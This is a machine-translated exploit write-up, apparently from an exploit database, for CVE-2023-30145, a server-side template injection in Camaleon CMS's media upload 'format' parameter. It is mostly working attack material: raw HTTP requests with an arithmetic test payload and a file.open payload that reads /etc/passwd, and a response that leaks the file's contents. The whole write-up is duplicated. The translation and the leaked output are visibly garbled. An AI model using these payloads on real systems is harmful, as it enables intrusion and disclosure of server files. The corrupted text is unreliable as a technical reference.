利用标题: Camaleon CMS v2.7.0-服务器端模板注入(SSTI)
利用作者: Parag Bagul
CVE: CVE-2023-30145
## 描述
发现Camaleon CMS v2.7.0被发现包含服务器端模板
通过格式参数注入(SSTI)漏洞。
##受影响的组件
所有低于2.7.0的版本都受到影响。
## 作者
帕拉格马云惹不起马云巴格尔(Parag Bagul)
##复制步骤
1。打开目标URL:
2。上传任何文件并拦截请求。
3。在“格式”参数值中,添加有效负载`test%=7*7%test“。
4。检查响应。它应该返回77的乘法
消息“不允许使用文件格式(DQOPI49VUUVM)”。
##检测:
#request:
post/admin/媒体/上载?操作=false HTTP/1.1
host: target.com
用户代理: Mozilla/5.0(Windows NT 10.0; RV:102.0)壁虎/20100101
Firefox/102.0
接受: /
Accept-Language: en-us,en; q=0.5
Accept-incoding: Gzip,放气
Referer: http://target.com/admin/profile/edit
X-重新要求- WITH: XMLHTTPREQUEST
content-type:多部分/form-data;
边界=---------------------------------- 327175120238370517612522354688
内容长度: 1200
Origin: http://target.com
DNT: 1
连接:关闭
cookie: cookie
-------------------------------------- 327175120238370517612522354688
content-disposition: form-data; name='file_upload';文件名='test.txt'
content-type:文本/平原
测试
-------------------------------------- 327175120238370517612522354688
content-disposition: form-data;名称='版本'
-------------------------------------- 327175120238370517612522354688
content-disposition: form-data;名称='thumb_size'
-------------------------------------- 327175120238370517612522354688
content-disposition: form-data;名称='格式'
测试%=7*7%测试
-------------------------------------- 327175120238370517612522354688
content-disposition: form-data;名称='Media_formats'
图像
-------------------------------------- 327175120238370517612522354688
content-disposition: form-data;名称='尺寸'
-------------------------------------- 327175120238370517612522354688
content-disposition: form-data;名称='私人'
-------------------------------------- 327175120238370517612522354688
content-disposition: form-data;名称='文件夹'
/
-------------------------------------- 327175120238370517612522354688
content-disposition: form-data;名称='skip_auto_crop'
真的
------------------------------------- 3271751202383705176125222354688-
#响应:
http/1.1 200好
content-type:文本/html; charset=UTF-8
连接:关闭
状态: 200 OK
cache-control: max-age=0,私人,必须重新值
set-cookie: cookie
内容长度: 41
文件格式不允许(test49test)
#利用:
要执行命令,请添加以下PAYLOAD:
testQopi%=file.open('/etc/passwd')。读取%fdtest
请求:
post/admin/媒体/上载?操作=true http/1.1
host: target.com
用户代理: Mozilla/5.0(Windows NT 10.0; RV:102.0)壁虎/20100101
Firefox/102.0
接受: /
Accept-Language: en-us,en; q=0.5
Accept-incoding: Gzip,放气
Referer: http://target.com/admin/media
X-重新要求- WITH: XMLHTTPREQUEST
content-type:多部分/form-data;
边界=--------------------------------- 104219633614133026962934729021
内容长度: 1237
Origin: http://target.com
DNT: 1
连接:关闭
cookie: cookie
---------------------------------------------- 104219633614133026962934729021
content-disposition: form-data; name='file_upload';文件名='test.txt'
content-type:文本/平原
测试
---------------------------------------------- 104219633614133026962934729021
content-disposition: form-data;名称='版本'
---------------------------------------------- 104219633614133026962934729021
content-disposition: form-data;名称='thumb_size'
---------------------------------------------- 104219633614133026962934729021
content-disposition: form-data;名称='格式'
dqopi%=file.open('/etc/passwd')。读取%fdfdsf
---------------------------------------------- 104219633614133026962934729021
content-disposition: form-data;名称='Media_formats'
---------------------------------------------- 104219633614133026962934729021
content-disposition: form-data;名称='尺寸'
---------------------------------------------- 104219633614133026962934729021
content-disposition: form-data;名称='私人'
---------------------------------------------- 104219633614133026962934729021
content-disposition: form-data;名称='文件夹'
/
---------------------------------------------- 104219633614133026962934729021
content-disposition: form-data;名称='skip_auto_crop'
真的
------------------------------------------------ 104219633614133026962934729021-
响应:
响应:
http/1.1 200好
content-type:文本/html; charset=UTF-8
连接:关闭
状态: 200 OK
set-cookie: cookie
内容长度: 1816
文件格式不允许(dqopiroot:x:0:03:root:/root3:/bin/bash/bash
daemon:x:13333:daemon:/usr/sbin:/usr/usr/sbin/nologin
BIN:X3:2333333333333333:/bin:/usr/sbin/nologin
SYS:X3333333333333:SYS:/dev:/usr/sbin/nologin
Sync:x3:4:65343:Sync:/bin3:/bin/sync
Games:x3:5:603360games:/usr/games:/usr/sbin/nologin
MAN:X333333333333:MAN3:/var/cache/man:/usr/sbin/nololgin
lp:x333333:7:lp:/var/spool/lpd:/usr/sbin/nologin
Mail:x3:83333:mail:/var/mail:/usr/sbin/nolololin
news:x:9:93360news:/var/spool/news:/usr/sbin/nololgin
Uucp:x3:10333333:uucp:/var/spool/uucp:/usr/sbin/nologin
PROXY:X33333333333333
ROXY:/BIN3:/USR/SBIN/NOLOGIN
www-data:x33333333333333333:wwwww-data:/var/wwwww3:/usr/sbin/nolologin
Backup:x3:333333333:backup:/var/backups:/usr/sbin/nologin
FDFDSF)
利用作者: Parag Bagul
CVE: CVE-2023-30145
## 描述
发现Camaleon CMS v2.7.0被发现包含服务器端模板
通过格式参数注入(SSTI)漏洞。
##受影响的组件
所有低于2.7.0的版本都受到影响。
## 作者
帕拉格马云惹不起马云巴格尔(Parag Bagul)
##复制步骤
1。打开目标URL:
https://Target.com/admin/Media/upload2。上传任何文件并拦截请求。
3。在“格式”参数值中,添加有效负载`test%=7*7%test“。
4。检查响应。它应该返回77的乘法
消息“不允许使用文件格式(DQOPI49VUUVM)”。
##检测:
#request:
post/admin/媒体/上载?操作=false HTTP/1.1
host: target.com
用户代理: Mozilla/5.0(Windows NT 10.0; RV:102.0)壁虎/20100101
Firefox/102.0
接受: /
Accept-Language: en-us,en; q=0.5
Accept-incoding: Gzip,放气
Referer: http://target.com/admin/profile/edit
X-重新要求- WITH: XMLHTTPREQUEST
content-type:多部分/form-data;
边界=---------------------------------- 327175120238370517612522354688
内容长度: 1200
Origin: http://target.com
DNT: 1
连接:关闭
cookie: cookie
-------------------------------------- 327175120238370517612522354688
content-disposition: form-data; name='file_upload';文件名='test.txt'
content-type:文本/平原
测试
-------------------------------------- 327175120238370517612522354688
content-disposition: form-data;名称='版本'
-------------------------------------- 327175120238370517612522354688
content-disposition: form-data;名称='thumb_size'
-------------------------------------- 327175120238370517612522354688
content-disposition: form-data;名称='格式'
测试%=7*7%测试
-------------------------------------- 327175120238370517612522354688
content-disposition: form-data;名称='Media_formats'
图像
-------------------------------------- 327175120238370517612522354688
content-disposition: form-data;名称='尺寸'
-------------------------------------- 327175120238370517612522354688
content-disposition: form-data;名称='私人'
-------------------------------------- 327175120238370517612522354688
content-disposition: form-data;名称='文件夹'
/
-------------------------------------- 327175120238370517612522354688
content-disposition: form-data;名称='skip_auto_crop'
真的
------------------------------------- 3271751202383705176125222354688-
#响应:
http/1.1 200好
content-type:文本/html; charset=UTF-8
连接:关闭
状态: 200 OK
cache-control: max-age=0,私人,必须重新值
set-cookie: cookie
内容长度: 41
文件格式不允许(test49test)
#利用:
要执行命令,请添加以下PAYLOAD:
testQopi%=file.open('/etc/passwd')。读取%fdtest
请求:
post/admin/媒体/上载?操作=true http/1.1
host: target.com
用户代理: Mozilla/5.0(Windows NT 10.0; RV:102.0)壁虎/20100101
Firefox/102.0
接受: /
Accept-Language: en-us,en; q=0.5
Accept-incoding: Gzip,放气
Referer: http://target.com/admin/media
X-重新要求- WITH: XMLHTTPREQUEST
content-type:多部分/form-data;
边界=--------------------------------- 104219633614133026962934729021
内容长度: 1237
Origin: http://target.com
DNT: 1
连接:关闭
cookie: cookie
---------------------------------------------- 104219633614133026962934729021
content-disposition: form-data; name='file_upload';文件名='test.txt'
content-type:文本/平原
测试
---------------------------------------------- 104219633614133026962934729021
content-disposition: form-data;名称='版本'
---------------------------------------------- 104219633614133026962934729021
content-disposition: form-data;名称='thumb_size'
---------------------------------------------- 104219633614133026962934729021
content-disposition: form-data;名称='格式'
dqopi%=file.open('/etc/passwd')。读取%fdfdsf
---------------------------------------------- 104219633614133026962934729021
content-disposition: form-data;名称='Media_formats'
---------------------------------------------- 104219633614133026962934729021
content-disposition: form-data;名称='尺寸'
---------------------------------------------- 104219633614133026962934729021
content-disposition: form-data;名称='私人'
---------------------------------------------- 104219633614133026962934729021
content-disposition: form-data;名称='文件夹'
/
---------------------------------------------- 104219633614133026962934729021
content-disposition: form-data;名称='skip_auto_crop'
真的
------------------------------------------------ 104219633614133026962934729021-
响应:
响应:
http/1.1 200好
content-type:文本/html; charset=UTF-8
连接:关闭
状态: 200 OK
set-cookie: cookie
内容长度: 1816
文件格式不允许(dqopiroot:x:0:03:root:/root3:/bin/bash/bash
daemon:x:13333:daemon:/usr/sbin:/usr/usr/sbin/nologin
BIN:X3:2333333333333333:/bin:/usr/sbin/nologin
SYS:X3333333333333:SYS:/dev:/usr/sbin/nologin
Sync:x3:4:65343:Sync:/bin3:/bin/sync
Games:x3:5:603360games:/usr/games:/usr/sbin/nologin
MAN:X333333333333:MAN3:/var/cache/man:/usr/sbin/nololgin
lp:x333333:7:lp:/var/spool/lpd:/usr/sbin/nologin
Mail:x3:83333:mail:/var/mail:/usr/sbin/nolololin
news:x:9:93360news:/var/spool/news:/usr/sbin/nololgin
Uucp:x3:10333333:uucp:/var/spool/uucp:/usr/sbin/nologin
PROXY:X33333333333333
ROXY:/BIN3:/USR/SBIN/NOLOGINwww-data:x33333333333333333:wwwww-data:/var/wwwww3:/usr/sbin/nolologin
Backup:x3:333333333:backup:/var/backups:/usr/sbin/nologin
FDFDSF)
